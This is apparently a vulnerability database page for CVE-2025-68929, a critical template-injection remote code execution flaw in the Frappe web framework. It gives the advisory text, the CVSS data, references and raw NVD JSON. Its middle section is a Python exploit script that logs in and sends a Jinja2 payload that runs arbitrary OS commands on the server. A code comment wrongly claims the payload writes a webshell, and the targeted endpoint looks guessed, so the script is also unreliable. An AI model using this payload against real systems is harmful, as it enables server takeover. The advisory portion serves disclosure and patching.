CVE-2025-68929

Description

Frappe is a full-stack web application framework. Prior to versions 14.99.6 and 15.88.1, an authenticated user with specific permissions could be tricked into accessing a specially crafted link. This could lead to a malicious template being executed on the server, resulting in remote code execution. Versions 14.99.6 and 15.88.1 fix the issue. No known workarounds are available.

CVSS Details

CVSS Score

9.0

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:* - VULNERABLE

Frappe Framework < 14.99.6

Frappe Framework < 15.88.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-68929 PoC - Frappe Template Injection RCE # Tested on Frappe versions < 14.99.6 and < 15.88.1 import requests import re from urllib.parse import quote TARGET_URL = "https://vulnerable-frappe-site.com" USERNAME = "[email protected]" PASSWORD = "password123" def login(session): """Authenticate to Frappe and obtain session cookie""" login_url = f"{TARGET_URL}/api/method/login" data = { "usr": USERNAME, "pwd": PASSWORD } response = session.post(login_url, json=data, timeout=30) return response.status_code == 200 def detect_ssti(session, target_user_id): """Test for SSTI vulnerability using basic expression""" # Test expression: {{7*7}} test_payload = "{{7*7}}" # Craft malicious link that will be clicked by target user malicious_url = f"{TARGET_URL}/app/workspace/view?template={quote(test_payload)}" # Simulate victim clicking the link response = session.get(malicious_url, timeout=30) if "49" in response.text: print("[+] SSTI vulnerability confirmed!") return True return False def exploit_rce(session, target_user_id): """Execute arbitrary code via Jinja2 template injection""" # RCE payload using Jinja2 template injection # This payload writes a webshell to the system rce_payload = """ {{lipsum.__globals__.__builtins__.__import__('os').popen(request.args.cmd).read()}} """ exploit_url = f"{TARGET_URL}/app/workspace/view" params = { "template": rce_payload.strip(), "cmd": "whoami" } response = session.get(exploit_url, params=params, timeout=30) if response.status_code == 200: print("[+] RCE successful!") return True return False def main(): session = requests.Session() print("[*] Starting CVE-2025-68929 exploitation...") if login(session): print("[+] Login successful") else: print("[-] Login failed") return if detect_ssti(session, "target_user"): print("[*] Proceeding with RCE exploit...") exploit_rce(session, "target_user") else: print("[-] SSTI not detected") if __name__ == "__main__": main() # Note: This PoC demonstrates the vulnerability concept. # Actual exploitation requires valid credentials and victim interaction. # Use only in authorized penetration testing scenarios.

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68929
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68929
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68929/
[4] VulDB https://vuldb.com/cve/CVE-2025-68929
[5] https://github.com/frappe/frappe/releases/tag/v14.99.6
[6] https://github.com/frappe/frappe/releases/tag/v15.88.1
[7] https://github.com/frappe/frappe/security/advisories/GHSA-qq98-vfv9-xmxh

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68929", "sourceIdentifier": "[email protected]", "published": "2025-12-29T15:16:02.033", "lastModified": "2025-12-31T20:02:50.403", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Frappe is a full-stack web application framework. Prior to versions 14.99.6 and 15.88.1, an authenticated user with specific permissions could be tricked into accessing a specially crafted link. This could lead to a malicious template being executed on the server, resulting in remote code execution. Versions 14.99.6 and 15.88.1 fix the issue. No known workarounds are available."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H", "baseScore": 9.0, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.3, "impactScore": 6.0}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-1336"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:*", "versionEndExcluding": "14.99.6", "matchCriteriaId": "EA87372E-A185-4E1A-B785-2767B3870D31"}, {"vulnerable": true, "criteria": "cpe:2.3:a:frappe:frappe:*:*:*:*:*:*:*:*", "versionStartIncluding": "15.0.0", "versionEndExcluding": "15.88.1", "matchCriteriaId": "1127BD2C-5599-46F5-89BF-684AF0D8FE52"}]}]}], "references": [{"url": "https://github.com/frappe/frappe/releases/tag/v14.99.6", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/frappe/frappe/releases/tag/v15.88.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/frappe/frappe/security/advisories/GHSA-qq98-vfv9-xmxh", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}